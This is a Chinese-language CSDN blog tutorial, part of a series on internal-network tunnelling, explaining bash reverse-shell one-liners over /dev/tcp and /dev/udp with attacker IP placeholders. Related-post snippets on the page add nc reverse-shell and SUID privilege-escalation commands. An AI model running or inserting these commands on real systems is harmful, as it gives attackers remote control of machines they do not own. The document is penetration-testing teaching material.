内网隧道代理技术(七)之Bash反弹shell

最新推荐文章于 2024-04-15 00:46:24 发布
最新推荐文章于 2024-04-15 00:46:24 发布
阅读量752 收藏 1
点赞数 1
分类专栏: 内网隧道代理技术 文章标签: bash linux 网络安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/131385453
版权

Bash反弹shell

Bash介绍

Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的Shell

Bash 反弹Shell的命令如下:

bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1
bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&2
bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1
bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2

接下来,我们逐步分解,对这些参数进行详细介绍

“bash-i” 是指打开一个交互式的Shell

"&“符号用于区分文件和文件描述符,”>&“符号后面跟文件时,表示将标准输出和标准错误输出重定向至文件,”>&“符号后面跟数字时表示后面的数字是文件描述符,不加”&“符号则会把后面的数字当成文件。数字"0”,“1”,"2"是LinuxShell下的文件描述符, “0”是指标准输入重定向, “1”是指标准输出重定向, “2”是指错误输出重定向。

“/dev"目录下"tcp"和"udp"是Linux中的特殊设备,可用于建立Socket连接,读写这俩文件就相当于是在Socket连接中传输数据。”>&/dev/tcp/攻击机_ip/攻击机端口"则表示将标准输出和标准错误输出重定向到"/dev/tcp/攻击机ip/攻击机端口"文件中,也就是重定向到了攻击机,这时目标机的命令执行结果

了解本专栏 订阅专栏 解锁全文
怰月
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
反弹shell bash -i命令
m0_37638874的博客
09-07 3799
这只是bash实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入host port参数,就能发起一个socket连接。复制格式有num1&num2,区别是,前者是以只读的形式打开,后者是以写的形式打开,这里两者均可。Linux系统中,把一切都看做是文件,当进程打开现有文件或创建新文件时,内核向进程返回一个文件描述符,,A先开启一个监听端口,让B去连接A的这个端口,连接成功后,A就能控制B了。是linux中的一个特殊设备,打开这个文件就相当于。
花一天时间搞懂反弹shell的命令!bash -i >& /dev/tcp/${HOST}/${PORT} 0>&1!
weixin_53306211的博客
10-28 1737
【代码】花一天时间搞懂反弹shell的命令!
反弹shell的命令大全
G3et的博客
03-21 875
【代码】反弹shell的命令大全。
Shell】重定向以及基础的bash反弹shell的学习
BrosyveryOK的博客
09-14 1678
最近学了下shell脚本的编写,看见重定向想起前几天反弹shell的一道题,当时还看不太懂,学完重定向之后就有点能看懂了,写篇文章记录一下。
Bash重定向和反弹Shell相关
車鈊的博客
03-08 786
文章目录BASH重定向文件描述符一般重定向及特殊符号对文件描述符重定向组合型的重定向关于重定向需要重点强调的1.`&`用于表示该文件所指向的文件或流(&句柄号),而不再是该文件本身2.command `%>` file3.`cmd 0>1`和`cmd >file 0>&1`,文件和句柄4.`cmd >/dev/null 2>/dev/null`交互式Bash反弹shell测试Q/A问题1:问题2:参考链接:参考链接: BASH重定向 文件描述符
浅析Linuxbash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
bash-shell-生成jwt之mkjwt.txt
06-24
通过bash/shell生成jwt的脚本
Linux之认识BASHShell.docx
08-11
Linux世界中,Bash(Bourne-Again SHell)和Shell是两个至关重要的概念,尤其是对于系统管理和运维人员而言。本文将深入探讨这两个概念及其相关知识。 首先,让我们来了解一下ShellShell是操作系统内核与用户...
linux bash shell中文手册
05-03
Linux Bash Shell 中文手册是为Linux用户和系统管理员提供的一份详细指南,涵盖了Bash Shell的基本用法和高级特性。Bash(Bourne-Again SHell)是GNU项目下的Unix/Linux操作系统默认的命令行解释器,它继承并扩展了...
Linux常用命令
hangoer的博客
08-28 718
命令格式的说明 命令格式:命令 [-选项][参数] 参数 eg: [root@qianfeng01 ~]# ls -la /usr 说明: ⼤部分命令遵从该格式 多个选项时,可以⼀起写 eg: [root@qianfeng01 ~]# ls –l –a ls –la 简化选项与完整选项(注:并⾮所有选项都可使⽤完整选项) eg: [root@qianfeng01 ~]# ls –all ls –a 帮助命令:(相当于命令说明书) 帮助命令 man 英⽂:manual 命令路径:/usr/bin/man 执
Linux反弹shell方式总结
qq_43936524的博客
12-11 1010
文章目录bash反弹基础知识指令分析 bash反弹 反弹指令: bash -i >& /dev/tcp/ip/port 0>&1 反弹步骤: 在kail上开启7777侦听: nc -lvp 7777 在靶机上输入反弹指令即可反弹成功 基础知识 linux下有三个标准的文件描述符: 0 - stdin 代表标准输入,使用<或<< 1 - stdout 代表标准输出,使用>或>> 2 - stderr 代表标准错误输出,使用2>或2>
linux反弹shell
afjkslahdfkaJDHU的博客
11-26 2410
0x01. bash 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号 解释: bash -i 打开一个交互的bash >& 将标准错误输出重定向到标准输出 /dev/tcp/x.x...
linux提权方法(不断更新)
qq_42430287的博客
04-13 583
1.suid提权 搜索符合条件的可以用来提权的: find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \; find / -user root -perm -4000 -print 2>/dev/null 三种都可以 搜索可以提权的程序,一般有以下 : nmap vi...
linux 反弹 socket,反弹shell基础
weixin_34138397的博客
05-15 253
1. 从Bash一句话shell讲起bash -i >& /dev/tcp/172.168.1.1/80 0>&1将这句话拆开来看,bash -i,>&,/dev/tcp/,0>&1,有三个知识点。(1)bash -i是打开一个交互的bash(2) /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用...
安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6078
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
Linux反弹Shell
m0_73199983的博客
03-06 1231
被控端主动发起连接请求连接控制,通常被控制端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收送过来的数据包。被控端bash -i>&/dev/tcp/192.168.81.154(控制端IP)/6666 (控制端想要开放的端口号)0>&1bash -i打开一个交互式的bash shell。>&或者&>>&、&>:混合输出(正确、错误的输出都输出到一个地方),将标准输出、错误输出全都重定向到 /dev/tcp/HOST/PORT,即控制端如果不想用>&或者。
内网渗透-反弹shell的N种姿势
最新发布
lza20001103的博客
04-15 1001
内网渗透-反弹shell的N种姿势
反弹shell常用命令
mirocky的博客
01-15 8568
反弹shell常用命令 1 attacker端的监听——netcat (1) windows环境下下载netcat 下载地址 将如图的nc.exe所在文件夹添加到环境变量 (2) linux环境下下载netcat yum install netcat (3) 安装结束 使用如下命令判断是否安装成功 nc -h 使用如下命令开始监听 nc -lvvp port 2 靶机命令 (1) bash bash一句话为: bash -i >& /dev/tcp/ip/port 0>&a
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4644
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linuxshell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
bash反弹shell
03-16
Bash反弹shell是指利用Bash命令解释器执行特定的命令,从而在远程主机上实现一个反向shell,以便攻击者可以在远程主机上执行命令并控制该主机。 具体来说,攻击者可以在本地主机上启动一个监听程序,并在远程主机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值